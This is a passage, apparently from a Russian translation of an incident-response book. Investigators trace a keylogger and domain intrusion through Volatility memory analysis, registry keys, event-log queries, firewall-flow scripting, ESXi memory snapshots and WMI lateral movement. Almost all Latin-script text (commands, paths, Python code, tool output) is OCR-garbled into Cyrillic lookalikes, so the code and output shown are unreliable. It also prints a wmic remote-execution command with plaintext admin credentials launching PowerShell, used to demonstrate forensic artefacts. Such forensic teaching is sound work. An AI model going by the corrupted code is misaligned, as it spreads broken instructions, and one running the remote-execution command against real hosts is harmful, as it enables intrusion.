\Реѵісе\КзесОО 

860 

0x548 

0x120089 Рііе 

\0еѵісе\На гсІс(І5кѴо1ите2\МіпсІоѵ\і5\Зуз1:ет32\еп -1ІЗ\се г 

860 

0x560 

0x120089 Рііе 

\Оеѵісе\ОеѵісеАрі\СМІ\Іоіііу 

860 

0x564 

0x120089 Рііе 

\Оеѵісе\ОеѵісеАрі\СММоіііу 

860 

Ѳх5с8 

0x120089 Рііе 

ХОеѵісеХОеѵісеАріЧСММоіііу 

860 

0x678 

0x120089 Рііе 

\0еѵісе\НагсІсіізк\/о1ите2\\л/іпс1о\лгз\Зузіет32\еп-иЗ\с гу 


Помните, что зѵсМозІ: - это легитимный процесс, который в 
своем оригинальном виде взаимодействует с системой для 
выполнения множества ее стандартных задач, отсюда количество 
файлов, созданных/модифицированных на диске. 

Мы ищем необычные директории, типа: 

с: \1:етр 

с: \іл/іпсІоіл/5\1:етр 
с: \изеп5\риЫіс 

с: \изег5\асІтіпІ5-1:га1:ог\аррсІа1:а\ 

И так далее. Эти универсальные директории часто 
используются вредоносными программами для сокрытия кода или 
загрузки временных данных. Мы также ищем подозрительные 
расширения: .ехе, .{тр, .рпі'и т.п. 

Однако, несмотря на все наши старания, мы не может найти 
ни одного файла, которого не должно быть на диске. Большинство 
вредоносных программ автоматически стирают свое присутствие на 
диске, как только они загружают свой код в память, поэтому мы не 
особо удивлены здесь. 

Мы продолжаем наш анализ, ищем другие популярные типы 
данных, с которыми работают вредоносные программы: ключи 
реестра! 




Они широко используются в целях закрепления. Возможно, 
атакующий сохранил свой злонамеренный код для перезапуска 
своего кейлоггера всякий раз, когда Барни открывает свой сеанс. 

Выводим список всех ключей реестра, с которыми работает 
5ѵсИо5І:.ехе в процессе своего выполнения: 


:~/ѵо1а1:і1і1:у руТЬоп ѵоі.ру -Т /гооіі/тетсіитр.тет -- 
ргоТі1е=Ыіп1Ѳх86_14393 ІіапсІ1е5 -1: кеу -р 860 


ѴоІаТГІіТу РоипбаТіоп ѴоІаТіІіІіу Ргатемогк 2.6 

ОТТзеі:(V) РісІ Напбіе Ассезз Туре РеТалЛз 


Ѳх9сІѲеѲе38 

860 

0x4 

0x9 Кеу 

0x96010508 

860 

0x60 

0x20019 Кеу 

Ѳх86Ь7Ѳа1Ѳ 

860 

Ѳхес 

ѲхТѲѲЗТ Кеу 

Ѳх961е68ТѲ 

860 

ѲхТс 

0x1 Кеу 

0x96152448 

860 

ѲхІЬс 

0x20019 Кеу 

0х961еа390 

860 

0х1с4 

0x20019 Кеу 

Ѳх961566е8 

860 

ѲхІТѲ 

ѲхТѲѲЗТ Кеу 


МАСНІМЕХ50РТѴМКЕХ30РТМАКЕХМІСРЮ50РТХШІ' 

МАСНІМЕ\5У5ТЕМ\ЗУ5ТЕМ\С0І\ІТВ0І_5ЕТѲѲ1\С0Г' 

МАСНІМЕХ30РТМАКЕХ30РТМАКЕХСІ.А55Е5 

МАСНШЕХ5У5ТЕМХ5У5ТЕМХС0МТВ0І-5ЕТѲѲ1ХС0І' 

иЗЕВХ .ОЕРАІІІ-ТХ .РЕРАШ-ТХСОМТРЮІ- РАМЕІЛІ1 

МАСНІМЕ\5У5ТЕМ\5У5ТЕМ\СОМТРЮІ_5ЕТ001\СОІ' 

МАСНШЕХЗОРТМАВЕХЗОРТМАВЕХСІ-АЗЗЕЗ 


Значение ассе55 (доступ) связано с каждым ключом реестра, 
это помогает нам определить тип выполняемой операции. 

Мы главным образом сфокусируемся на следующих 
операциях: 


• КЕѴ_АІ_І__АССЕ55 (0ХР003Р) 

• КЕѴ_5ЕТ_ѴАШЕ (0x0002) 

• КЕѴ_ІлІКІТЕ (0x20006) 


Это приводит нас к следующим ключам: 


ДсИпезБ НапсІІе 

0х8сІЬ70а10 0хес 
0х9сІ1566е8 0x1^0 

0ха863с868 0х1сІсІ0 
0ха865сІ360 0х1е38 


Ке§ізТ:гу кеу 

МАСНІМЕ\50РТЫДРЕ\50РТЫАКЕ\СЕА55Е5 

МАСНІМЕ\50РТЫДКЕ\50РТЫАКЕ\СЕА55Е5 

МАСНІМЕ\50РТ1лІДКЕ\50РТНАКЕ\МІСК050РТ\ЫІГЮ0Ѵ\І5\СІІККЕМТѴЕК5І0І\І\ВІТ5 

МАСНІІ\ІЕ\50РТЫДВЕ\50РТНАКЕ\МІСК050РТ\Іл/ІШ0Н5\СІІККЕМТѴЕК5І0М\ВІТ5 


Мы выводим содержимое каждого из этих ключей, чтобы 
определить, имеется ли в них какой-либо вредоносный код. 





Поскольку мы, по всей видимости, имеем дело с бесфайловой 
малварью, то ожидаем найти что-то типа однострочной команды, 
которая, к примеру, загружает и исполняет код с удаленного 
сервера: 


:~/ѵо1а!іШу руТНоп ѵоі.ру -Т /гооТ/тетсІитр.тет -- 
рпоТі1е=Міп10х86_14393 ргіпТкеу -К " 

50РТЫАКЕ\50РТШКЕ\М1СК050РТ\М1Ш0М5\СШКЕГЛЛ/ЕК510М\В1Т5 " 


Ѵоіаіііііу РоипсІаТіоп ѴоІаТіІіТу Ргашемогк 2.3 
Ее^епсІ: (5) = БТаЫе (V) = Ѵоіаіііе 


Ке§І5І:гу: 5оТТмаге\Місго5оТТ\Мігиіом5\Сиггеп1:ѵег5Іоп\Ві1:5 
Кеу пате: 5ѵс (5) 

І_а5І: ирсіаіесі: 2017-05-14 20:04:44 

БиЬкеуз: 

Ѵаіиез: 

КЕС_<2Ы0К0 ЗоЬМіпітитКеІгуОеІау : (5) 258 

КЕе_ОШКО Ео§Рі1е5І2е : (5) 1 

КЕС_ОШ(Ю УзеЕтСотраІ: : (5) 2 

Ы_ 


Вообще ничего... Эта малварь немного фрустрирует нас. 

Она загружает только код, необходимый для выполнения 
определенной задачи (кейлоггинг, в данном случае) и даже не 
заботится о других базовых вещах, типа закрепления. 

Может быть, атакующий свил себе гнездышко где-то еще и 
компьютер Барни его попросту не волнует, либо мы слишком 
сильно опоздали, и устойчивость была достигнута другой 
малварью, еще до кейлоггера... 

Давайте вспомним, атакующий каким-то образом получил 
привилегии администратора домена, создал учетную запись 
а_ирсІа1:е в начале января, затем нацелился на компьютер Барни 





(примерно 12 марта) и установил кейлоггер, чтобы сграбить его 
учетную запись в мэйнфрейме. 

Пугает мысль, что он получил гораздо большее: банковскую 
учетную запись Барни, номер кредитной карты, пароли от 
электронной почты и так далее. 

Мы просим отдел кадров срочно связаться с Барни, чтобы тот 
проверил наличие мошеннических действий в отношении своих 
аккаунтов и уведомил соответствующие организации. 

Учитывая обнаруженные нами элементы, мы временно 
приостанавливаем изучение компьютера Барни. Мы всегда сможем 
восстановить его позже, чтобы углубиться в поиск прочих деталей, 
если возникнет такая необходимость. 

А сейчас нашей приоритетной задачей становится понять, что 
произошло в промежуток времени между первым 
несанкционированным доступом в АО и атакой на мэйнфрейм. В 
частности, нам нужно определить, где атакующий свил себе 
гнездышко и доступ к каким документам получил. 


Полная картина 


"Пролей свой свет на меня, будь моим проводником, 
чтобы я смог увидеть полную картину" 

йгеат ТЬеаСег 59 


59 Прим, переводчика: Н№з://ѵѵѵѵѵѵ.ѵоиіиЬехот/ѵѵаісН?ѵ=ѴѴрдМѴ4Мѵеід 




К настоящему времени мы знаем, что атакующий создал 
учетную запись администратора домена а_ирсІаѣе и имеет 
следующий С&С-сервер: 219.128.13.22. Теперь мы будем 
использовать эти две находки, чтобы обнаружить другие 
зараженные машины. 

Мы просим администраторов файрвола и прокси найти все 
машины І_ео5ігаі, которые обменивались данными с ІР-адресом 
С&С за последние несколько месяцев. 

Параллельно, мы приступаем к извлечению событий из 
журнала событий на контроллере домена, в частности, нас 
интересует событие с го 4625. ѴѴіпсІоѵѵз создает это событие 
каждый раз, когда происходит успешная аутентификация на любой 
машине в домене. 

Мы можем запросить логи событий, используя 
РоѵѵегЗИеІІ-команду Сеѣ-ЫіпЕѵепІ: в контроллере домена. 60 Нас 
интересуют только логи учетной записи а_ирсІа1:е, поэтому мы 
добавляем фильтры в этой связи, чтобы снизить уровень шума: 


Р5> беТ-МіпЕѵепТ -І.о§Мате БесигіТу -РИТегХРаТН ' */5у5І:епі/Еѵепі:І0="4624" 
апсі *[Еѵеп1:^а1:а[^а1:а[@Nате="5иЬ^ес1;^5егNате' , ] апсі (ОаТа^аир^аТе”)] ] ’ | 

зеіесі: -ЕхрапсІРгорегІіу теБзаее | 

Тіпсібіг /С: "Ыогк5І:а1:іоп Мате" 


ІР5 С :\и5егз\АсітіпІ5'1:га1ог> 

СеТ-ИлпЕуепТ -І-С^аліе 

зесигИу -РіІТегХРаТЬ, ' Ѵ5у5Тет/Еѵеп1:І[>='’4624'’ 

те=”5иЬ-]есЬи5егМаліе' 

’1 апсі ( 

ЩаТа="а._иі>сіа1:е"')11' 1 

зеІесЬ -ЕхрапсіРгорегіу теззаде І-ріпсіз-кг /С:"Ко 

ИогкзТаТіоп 

N3016: 

ИК0025 


Могкз*а*іоп 

Ыате: 

МК0089 


ѴѴогкіІаііоп 

Ыаліе: 

5Ѵ0099 


ѴѴогкіІаТіоп 

Ыаліе: 

5Ѵ1100 


КогкзТаТіоп 

N81116: 

5Ѵ1100 


ИогкзІаТіоп 

N8/116 : 

5Ѵ0990 



Пять машин, включая МК0025! Прибавилось четыре грязных 
машины, которые следует вывести из эксплуатации и восстановить. 


60 Ю события 1102 означает, что журнал аудита был очищен. Всегда ищите его во время 
расследования, если подозреваете, что атакующий зачистил свои следы. 





Однако, перед тем, как это сделать, нам нужно понять, зачем 
вообще атакующий нацелился на них, и что самое важное, какая из 
них стала нулевым пациентом (то есть, какую из этих систем 
атакующий использовал для закрепления во внутренней сети 
І_ео8ігаі с самого начала). 

Администраторы файрвола и прокси выдают нам список 
потенциально зараженных машин, которые связывались с сервером 
С2С: 

5Ѵ0301 

5Ѵ0990 

5Ѵ7510 

5Ѵ5500 

ЫК0025 

5Ѵ0088 

Странно. Только две машины представлены одновременно в 
обоих списках: рабочая станция Барни и сервер 5Ѵ0990. Либо есть 
еще одна учетная запись, использованная атакующим, либо есть 
дополнительные С2С-серверы, которые нам необходимо выявить. В 
любом случае, работы еще много. 

Давайте немного поиграем на стороне хакера. Мы 
закрепились на одной машине в сети, используя какой-либо новый 
эксплойт, доступный на рынке. 

Для горизонтального продвижения и заражения соседних 
машин с минимальными следами нам нужен какой-то вектор 
коммуникации, который позволит удаленно и легитимно выполнять 
код. Для этого мы можем использовать две распространенные в 
мире ѴѴіпсІоѵѵз ріѵоііпд-техники 61 : 


61 Исключим передачу файлов по ЗМВ (порт 445), поскольку он сначала передает файл, а 
затем регистрирует его как службу при помощи НРС (порт 135). 



• Удаленные вызовы процедур (НРС) - порты 135 и 49152-65535 
(или 5000-6000 в ѴѴіпсІоѵѵз 2003). Это специальные службы, 
которые позволяют администратору удаленно выполнять 
функции и процедуры на машинах, некоторые из которых 
позволяют исполнение кода. 

• Удаленный РоѵѵегЗНеІІ (ѴѴіпНМ) - порты 5985-5986. Служба 
ѴѴіпНМ принимает удаленные РоѵѵегЗИеІІ-команды от 
пользователей с администраторским правами. 

Если мы сможем визуально представить взаимодействия 
(сетевые пакеты) между зараженными машинами, 
сосредоточившись только на этих двух протоколах, то, возможно, 
сумеем понять образ действий атакующего: с какой машины 
началось заражение, какую из них он использует на текущий 
момент и так далее. 

Эта ключевая операция базируется на основном допущении: 
что мы сможем отследить по времени каждый пакет, которым 
обменивались эти машины между собой. К счастью для нас, 
главный файрвол логирует все отправленные пакеты за последние 
три месяца. Меньше повезло с тем фактом, что не весь трафик идет 
через файрвол. 

Многие из этих серверов находятся в одном сетевом сегменте, 
что приводит к путешествию ІР-пакетов через локальный свитч, 
который не сохраняет никаких логов. По итогу, из 121 
взаимодействия между зараженными машинами мы получаем лишь 
небольшое количество сетевых пакетов. 

И все же, это небольшое количество - лучше, чем ничего, и 
порой этого оказывается достаточно, чтобы выявить и понять 
порядок выполнения атаки. 62 


62 Подобная техника наиболее полезна, когда у нас есть достаточное количество серверов в 
трех разных сетевых сегментах. Расширенная диаграмма сети поможет понять, на каких 
машинах стоит сконцентрироваться... 



Для этого мы создаем группу в консоли управления 
файрволом, содержащую все подозреваемые машины, и извлекаем 
все залогированные коммуникации в группе через порты 135 63 , 5985 
и 5986. Затем мы экспортируем результат в СЗѴ-файл. 


:~/ саТ грсТІомаІІ .ТхТ 
Тіте;ІпіегРасе;Ргоі . ;5гс;АсИг;0е5І: Асісіг 

2017-01-03 02:05:17; Тхр0 .0;ТСР;192.168.1.29:59112;10.30.10.99:135 
2017-01-03 02:50:17; ТхрѲ .0;ТСР;192.168.1.25:9812;10.10.20.90:135 
2017-01-03 02:55:18;Тхр0. 0;ТСР; 10.30.10.99:41211;10.10.20.90:135 
2017-01-03 04:58:22; Тхр0 .0;ТСР;192.168.1.29:6718 ;10.30.20.110:135 
[■••] 


Чтобы разобраться в этих данных, пишем скрипт на Руііпоп, 
который разделит записи по неделям. По каждой неделе он 
подсчитает, сколько соединений было инициировано с одного ІР на 
другой, и сохранит это в отдельный файл. 

ітрогі: 05 
ітрогі сіаіеііте 
ітрогі: ге 
ітрогі: вуз 

# Создать выходной каталог 

і-р поі 05.раіН.ехІ5і5("оиіриі"): 

05 .такесІіг5("оиіриі") 

■Р1ом_соипі = {} 
сиггепі: = 1 

# Открыть входной файл 

и/ііИ орепС'./грс^Іо^аІІ.іхІ:", 'г') а5 ігѵРіІе: 

-Рог Ііпе іп ІгѵРіІе: 

# Получить дату регистрации и извлечь дату 

сІа1:е_5І:г = 5І:г(1іпе.5р1і1:(" ")[0]. 5ігір()) 


63 Коммуникация по НРС сначала использует порт 135, затем переключается на рандомный 
порт в динамическом диапазоне, упомянутом ранее. Поэтому нам нужно искать только порт 


135. 




# Если не дата, пропустить 

і-р пе. 5еагсІі( ' [а-гА-2]', сІа1:е_5І:г) ог сІа1:е_5І:г=="" : 
сопііпие 

сІа1:е_гесогсІ = сіа-ре-ріте. сіа-ре-ріте. 5-ргр-ріте(сІа1:е_5І:г, 
"%У-%т-%сГ) .сІаіеО 

# Извлечь ІР-адрес 

ір_згс = 5і:г(1іпе. 5р1гР(" ;") [3] . 5р1гР(" :") [0] . 5і:гір( )) 
ір_сІ5Іі = 5І:п(1іпе.5р1і1:(";") [4] .зрИ^С : ") [0] . 5І:пір()) 
кеу_ір = ір_згс + + ірсізі: 

# Получить номер недели 

іл/еек_питЬег = с)а1:е_гесогсІ. І50са1епсІаг() [1] 

# Если мы изменяли недели 

і-р сиггепі != меек_питЬег : 

# Записать в подходящий файл недели 

оиі = ореп("-Р1о1л^_"+51:^(си^^еп1:) + ".С5ѵ","1л^ ,, ) 

-Рог кеу, ѵаіие іп -Р1ои/_соип1:.і1:егі1:ет5() : 
оиі: .и/гі1:е(кеу+" ; "+5І:г (ѵаіие ) + "\п") 
оиі: . с1озе() 

-Р1оіл/_соигѵР = {} 
сиггегѵР = и/еек_питЬег 

# Иначе сохранить взаимодействие по этой неделе в словарь 

еізе: 

і-р кеу_ір іп -Р1оѵ\/_соип1:. кеуз(): 

-Р1оіл/_соипі:[кеу_ір] = -Р1ом_соип1:[кеу_ір] + 1 

еізе: 

-Р1ом_соип1:[кеу_ір] = 1 

ргіпі "[+] Ропе" 

По каждой неделе с января мы получаем следующие 
выходные данные 64 в отдельном файле: 


64 Я добавил разрешение имени, чтобы связать его с предыдущими результатами. 



ІР-адрес 

источника 

ІР-адрес 

назначения 

Количество 

соединений 

192.168.1.29 

(ѴѴК0029) 

10.30.10.99 

(ЗѴ0099) 

31 

192.168.1.25 

(ѴѴК0025) 

10.10.20.90 

(ЗѴ0990) 

23 

10.30.10.99 

(ЗѴ0099) 

10.10.20.90 

(ЗѴ0990) 

10 

192.168.1.29 

(ѴѴК0029) 

10.30.20.110 

(ЗѴ1100) 

9 


Чтобы представить это в более наглядном виде, мы рисуем 
следующую схему, отображающую эти взаимодействия (чем толще 
стрелка, тем больше трафика). Вот как выглядела сеть за три 
месяца до инцидента (до создания учетной записи а_ирсІа1:е): 


ЗѴ0990 


■■ 


а 


ЗѴ0099 


ЗѴ1100 


I 


ЗѴ7510 




ѴѴК0025 


ЯР 


ѴѴК0029 



Согласно имеющимся данным, это наиболее точная система 
отсчета, как выглядела сеть до какого-либо грубого проникновения: 
проходящий время от времени трафик между машинами, в 













основном доступ по НРС для взаимодействия с опубликованными 
службами (именованные каналы, удаленные приложения, 
специальные макросы ЕхсеІ и так далее). 

Тем не менее, ровно за два месяца до инцидента (вторая 
неделя января), картина в значительной степени изменяется. Это 
было время создания учетной записи а_ирсІаѣе: 


ЗѴ0990 


I е 


а 


ЗѴ0099 


ЗѴ1100 


7 «. 


І 


ѵ ЗѴ7510 


ЯР 


ѴѴК0025 


ЯР 


ѴѴК0029 



Множественные новые связи исходят с 5Ѵ0099, даже по 
направлению к рабочим станциям, что крайне необычно для 
нормального окружения ѴѴіпсІоѵѵз. 

Эта звездообразная сетевая структура из января раскрывает 
один важный факт: 5Ѵ0099 вероятнее всего является нашим 
нулевым пациентом! По всей видимости, атакующий получил свою 
первую учетную запись администратора домена на этой машине, 
перешел к созданию своей собственной учетной записи (а_ирсІа1:е), 
а затем начал распространение на другие сервера. 


Через неделю после этого поток коммуникаций демонстрирует 
очередное крупное изменение в диаграмме: 



Звездообразная сеть сдвинулась в сторону Р2Р-стиля 
коммуникаций. 5Ѵ0099 перестал быть хабом для атаки. Скорее, 
каждый сервер поочередно используется для инициирования 
соединений в направлении других ресурсов. 

Это, возможно, означает, что атакующий установил бэкдоры 
на эти сервера, и поэтому может напрямую выполнять команды для 
получения файлов или ріѵоі-продвижения на другие сервера, если 
понадобится. 

5Ѵ0099 мог бы стать нашей следующей целью для экспертизы, 
но есть опасение, что уже слишком поздно, чтобы можно было 
получить какие-либо интересные артефакты из памяти. Двух 
месяцев более чем достаточно, чтобы улики из памяти были 
уничтожены. 




После обсуждения с ІТ-командой, мы принимаем решение 
обратиться к серверу 5Ѵ0088, поскольку согласно сетевому потоку 
он по-прежнему отправляет значительное количество НРС-пакетов, 
большая часть из которых, вероятно, вредоносные. 

Кроме того, на нем хостятся некоторые важные файлы, 
которыми совместно пользуется совет директоров корпорации. Для 
них критически важно иметь конкретные доказательства касаемо 
того, что хакер смог прибрать к своим рукам. 

Наша основная задача, с другой стороны, это поиск 
вредоносных пейлоадов, ІР-адресов, всего того, что сможет дать 
нам больше улик для определения других зараженных машин. 

Мы также просим ответственных за файрвол и прокси: 

• Сообщить обо всех удаленных ІР-адресах, с которыми эти 
подозрительные сервера коммуницировали за последний 
месяц. Это должно раскрыть больше С2С-серверов. 

• Найти все внутренние сервера, отправлявшие НРС или 8МВ 
трафик на 5Ѵ0099 в январе. Нам нужно знать, как изначально 
атакующий оказался на этой машине. 

Раунд 2 

Доступ к компьютеру Барни был простой задачей, мы просто 
узнали у его коллег, где его рабочее место, и удостоверились в 
ІТ-отделе, что это действительно его основной компьютер. 

Доступ же к серверу 5Ѵ0088 требует совсем другого подхода. 
Все сервера в І_ео8ігаі виртуализованы гипервизорами Е8ХІ - 
почитайте на сайте ѴМѵѵаге об этом мощном аппаратном 
гипервизоре - это позволяет облегчить развертывание и поддержку. 


Вместо того, чтобы отправиться за 50 миль в дата-центр для 
снятия сырых копий в охлажденных машинных залах, мы 
прихлебываем кофе в кресле Аегоп, собирая форензик-улики. 


Мы используем официальный инструмент ѵЗрИеге для 
доступа к узлу Е8ХІ. На левой панели вы можете увидеть все 
виртуальные машины І_ео51гаі, на правой панели их спецификации 
виртуализованного оборудования: 


’О) 192 5 2.200 - ѵ$рЬеге СІ*п 


Рііе ЕОЛ Ѵіе* Іпѵепіогу АОтіпіЗгаІіоп РІіід-тх Неір 


и и й «о™ >вз ІлѵепЮгу > ^ Ілѵепйгу 


8? 


- (3 «хІ.ІеоЯгаТсогр 

В ІИ ѵі мор к 

В А) ѵып СІийег 

3 е»і.іеоягві.согр 
ф 5Ѵ008Е 
^ 5Ѵ0990 
$ 5Ѵ1101 
Ф 5Ѵ7Б10 
^ 5Ѵ0080 
$ 5Ѵ0990 
С* 5Ѵ1101 
& 5Ѵ7817 
^ 5Ѵ8080 
^ 5Ѵ9890 
$ 5Ѵ0901 
5Ѵ18І0 
5Ѵ8188 
Ъ 5Ѵ0890 


ІооаКммІіосакіотат ѴМжаге ЕЗХі, 5.0.0,469512 


СеМтд 5ТаПегі ■ гтиа МасКіпм КеаоиісеДІІо 

сэіюп РеіЕогтапса СопГідигаІшп ЮсаІ ІЛеге & Сгоцр: Еѵепіі Ряп 


бемпі 

Кегоигсеі 

МапиЕасйгег: 

ѴМлаге, Іпс. 

СРЦ имде: 1658 МНг 


Сарааіу 


.. . . 




32 х 2.666 СН 2 



ѴРчизгс ѵ* шаі Ріастогт 





СРиСоге*: 

Ргосе550г Туре: 

32 СРЦ5 х 2.666 СНг 

ІпЪгі(К) Соге(ТМ)2 0ио СРІІ 
Е6750 в 2.66СН* 

Метогу иьаде: 851.00 СВ 


СграаГу 

2047.49 66 





Ьсегве: 


Зогаде 

Огіѵе Туре 

СараеіЕу 


ОгАгааччѵ СлНаа*г< 

•» 

(| 0а*а$іосе1 

N011-53) 

35.00 СВ 

У 


ЕЗХі хранит папку (или хранилище данных) по каждой 
виртуальной машине. Она содержит данные логов (время работы, 
аппаратные ошибки и проч.), файл разметки жесткого диска 
машины (файл ѴМЭК) и дамп памяти (файл ѴМЕМ): 


0 

РаіаЯогеЬгоѵѵзег 

- [йаіаяогеі] 


_ П 

* СА \0 9 9 » X 

© 

Огйпе, 1 5иаіеп | 

[даіагіогеі] ѴѴнмІот 7 х64 





^ / 


Мате 

Сгове 

Вегеіідезіеіііе Сгове 

Тур РЕ ад 


(р 5Ѵ1101 


Жіп4 2012 х64-000001.ѵтсік 

1.082368,00 КВ 

12.582.910,00 КВ 

ѴіПиеІІе Резіріаі». [с!а(а$Тогеі]ЛѴіпгі» 


(5 5Ѵ7810 


^3 ѴѴт<1 2012 х64.ѵт0к 

12.582.910,00 К 


ѴігиіеІІеРе$ірІаі- [с!аіа$1оге1]\ЛГтсЬ 


(2 5Ѵ0088 


ідді ѴѴт<1 2012 х64.лѵгат 

8,48 КВ 


МісМ Я исНііде А... [0аІа5Іоге1]№іп0і 




]] ѴѴіікі 2012 х64-5пар5Ьо11.ѵтет 

1.048.576,00 КВ 


Оаіеі [с1аІа$1оге1]>Ѵіп0і 




ѵтѵѵаге.Іод 

358,81 КВ 


РгоІокоІИаІеі сіег. [<)аІа$Іоге1]\А/іпгіі 


К 1 «ЛГ7Я1Я 


ф іЛГіпЬ 2012 х64.ѵтх 

2,88 КВ 


ѴігГиеІІе МахсЬі.. [с1аіа5Іоге1]ѴѴіпс1» 


Кажется, процесс извлечения был полностью проведен для 
нас со стороны ЕЗХі. Идеальная настройка, не так ли? Почти. 
ѴМОК-файл - это точная копия жесткого диска, так что мы можем 
просто скопировать ее во временную общую папку ѴѴіпсІоѵѵз, 
которую мы настроили на обычной рабочей станции. 


























ѴМЕМ-файл, однако, далек от того, чтобы являться подлинной 
копией текущего состояния памяти. 

Согласно ѴМѵѵаге 65 , издателю ЕЗХі, ѴМЕМ-файлы - это 
“страничные файлы” (файлы подкачки), используемые 
гипервизором для дампа памяти на диск. Операция разбиения 
памяти на страницы происходит по определению в регулярные 
интервалы (х минут или х часов) для сброса памяти на диск, и таким 
образом не точно отражает ее текущее или настоящее состояние. 

Чтобы заставить ЕЗХі сбросить память на диск, нам нужно 
перевести виртуальную машину 5Ѵ00088 в режим ожидания. Будет 
создан файл со снапшотом (расширение ѴМЗЗ), который мы 
сможем смерджить с текущим ѴМЕМ-файлом для получения 
актуального дампа памяти. 

Мы используем утилиту ѵт552соге из ѴМѵѵаге І_аЬз 66 , чтобы 
выполнить объединение, с опцией “-М8”, поскольку имеем дело с 
ѴѴіпсІоѵѵз Зегѵег 2012: 


Ё:\>ѵт552соге-зЬ-8456865.ехе -М8 "ІлІіпсІ 2012 х64.ѵтет" "МіпсІ 2012 х64.ѵтзз” 
ѵтзз2соге ѵегзіоп 8456865 Соругі§ІгЬ (С) 1998-2017 ѴМиаге, Іпс. АН гі§Н*з гезегѵесі. 
|зсаппіп§ ра=Ѳ 1еп=Ѳх1ѲѲѲѲѲѲѲ 
. 10 МВз игі'Ь'Ьеп. 

. 20 МВз игШеп . 

. 30 МВз иггЫеп. 


Утилита дает на выходе единый файл дампа памяти, который 
мы сможем закинуть в Ѵоіаѣіііііу позже. 

Учитывая, что извлечение диска и памяти были выполнены 
вручную, нам нужно не забыть проставить хэш и временную метку, 
затем дважды продублировать ІІЗВ-флешку в целях резервного 
копирования. 


65 И1:1:р5://\л/\л/\л/.ѵт\л/аге.сот/5иррог1/ѵ\/555/сіос/\л/5 Іеагпіпд НІез іп а ѵт.НІтІ 

66 НіЬ5://ІаЬ5.ѵт\/ѵаге.сот/Ліпд5/ѵт552соге#геаиігетеп1:5 







Р5> сІаРе | оиР-РіІе -аррепсі ".\Ьа5Іі_5ѵ0088.РхР" 

Р5> СеР-РіІеНазІі ". \5ѵ0088_сІІ5к. ѵшсік" | РогтаР-І-І5р | оиР-РИе -аррепсі 
” . \На5Ь_5ѵ0088.1x1;" 

Р5> СеІ-РіІеНазН ". \тет_5ѵ0088.сІтр п | РогтаР-І.І5р | оиР-РіІе -аррепсі 
”. \Ьа5Іі_5ѵ0088.РхР'' 


Эта машина была, вероятно, скомпрометирована несколько 
недель назад, поэтому есть малая вероятность, что мы сможем 
найти оригинальную малварь, использованную для закрепления на 
машине. 


Однако, учитывая, что атакующий усиленно использовал эту 
машину для запуска кода и распространения на другие машины, мы 
можем рассчитывать на какой-нибудь остаточный код в памяти или 
- скрестим пальцы - даже файлы на диске, если он немного 
“подзабил”. 


Из консоли ѵЗрИеге мы знаем, что имеем дело с 64-битным 
ѴѴіпбоѵѵз Зегѵег 2012, что облегчает нам выбор правильного 
профиля Ѵоіаѣіііѣу: ІлІіп2012х64. 67 


:~/ѵо1аРі1іРу руРЬоп ѵоі.ру --іпРо 
ІѴоІаРіІіРу РоипсІаРіоп ѴоІаРіІіРу Ргатемогк 2.6 
РгоРіІез 


ѴІ5Іа5Р0х64 

ѴІ5Іа5Р0х86 

ѴІ5Іа5Р1х64 

[•••] 

Ыіп2012К2х64 

Ыіп2012х64 

Міп2Ѳ16х64_14393 

[...] 


А РгоТіІе Тог Ыіпсіоыб ѴібРэ 5Р0 х64 
А РгоРіІе Рог Ыіпсіоыб ѴібРэ 5Р0 х86 
А РгоРіІе Рог Ыіпсіоыб ѴІБІа 5Р1 х64 

А РгоРіІе Рог Ыіпсіоыб Бегѵег 2012 82 х64 
А РгоРіІе Рог Иіпсіомз 5егѵег 2012 х64 
А РгоРіІе Рог Ыіпсіоиб Бегѵег 2016 х64 


67 Альтернатива плагину ітадеіпГо - это ксІЬзсап. Этот плагин ищет структуру отладки ядра, 
которая хранит ключевую информацию о системе, и помогает Ѵоіаіііііу решить, какой профиль 
лучше подойдет для дампа памяти. 







Окей... с чего начать? Если мы посмотрим на карту трафика, 
которую изобразили ранее, то заметим, что атакующий активно 
полагается на НРС для прыжков с одного сервера на другой. 

Откладываем в сторону ѴѴіпНМ (используемый при помощи 
РоѵѵегЗИеІІ-команды Епіег-РББеззіоп) и вместо этого 
сосредоточимся на инструментах для ріѵоііпд и техниках с 
использованием НРС: ѴѴМІС (и его вариантах іпѵоке-ЫтіМеіІюсІ, 
СеІ-ІлІтіОЬз'есІ: и так далее). 68 

Удаленное соединение при помощи ѴѴМІ создает на целевой 
машине процесс под названием ЫтіРгѵБЕ .ехе, который затем 
порождает какую-либо команду от пользователя через ѴѴМІ. 

Данная вырезка из Ргосе55 Ехріогег 69 на тестовой машине 
демонстрирует это: 


ЕВ * ехріогег ехе 

0.03 

52.840 К 

74,448 К 

1888 ѴѴіпбоѵѵз Ехріогег 

МгсгозоЛ Согрогаііоп 

[ІТ 5рр ЕхіСотОЬі . Ехе 


1.128 К 

4.580 К 

2224 КМ5 Соппесііоп Вгакег 

МісгозоЙ Софогаіюп 

^ ЗегѵегМападег.ехе 


90,856 К 

50.060 К 

2272 5егѵег Мападег 

МісгозоЙ Соірогаііоп 

^ѴѴтіРгѵ5Е.ехе 


1.688 К 

5.988 К 

1164 ѴѴМІ Ргоѵісіег Нозі 

МісгозоЙ Согрогаііоп 




ншпза 



Ѳ роѵѵегеНеІІ.ехе 


46,124 К 

50.740 К 

2980 ѴѴіпбоѵѵз РоѵѵегЗНеІІ 

МісгозоЙ Согрогаііоп 

гаісопЬозІ.ехе 

0.01 

1.472 К 

3,804 К 

2216 Сопзоіе ѴѴіпгіоѵѵ Нозі 

МісгозоЙ Согрогаііоп 

поіерасі.ехе 

<0.01 

976 К 

3,964 К 

3064 Моіерасі 

МісгозоЙ Согрогаііоп 


іл/гпіс /посІе:192.168.1.18/и5ег:асІтіп/ра55іл/огсІ:АсІтіп861 роіл/егзИеІІ 

Данная команда породила ЫтіРгѵБЕ .ехе и РомегБИеІІ.ехе. 
Последующий вызов ѴѴМІС создал другой процесс: “поѣерасі”. Как 
только команда будет выполнена - поіерасі, РоѵѵегЗІіеІІ или любые 
другие дочерние процессы немедленно завершатся... за 
исключением ЫтіРгѵБЕ. 


68 Рзехес тоже использует НРС, но он также использует порт 445 для создания файла на диске 
и регистрации его как службы. Хотя мы можем и не найти службу в памяти, мы все же можем 
поискать соответствующие Ю событий 4697 или 7045 при анализе логов событий, хранимых на 
диске, позже при необходимости. 

69 ИіЬ5://бос5.тісго50й.сот/еп-и5/5Ѵ5ІпІ:егпаІ5/сіо\л/пІоасІ5/ргосе55-ехрІогег 









Он остается в памяти на какое-то время. Это могут быть 
секунды, минуты или часы, в зависимости от различных 
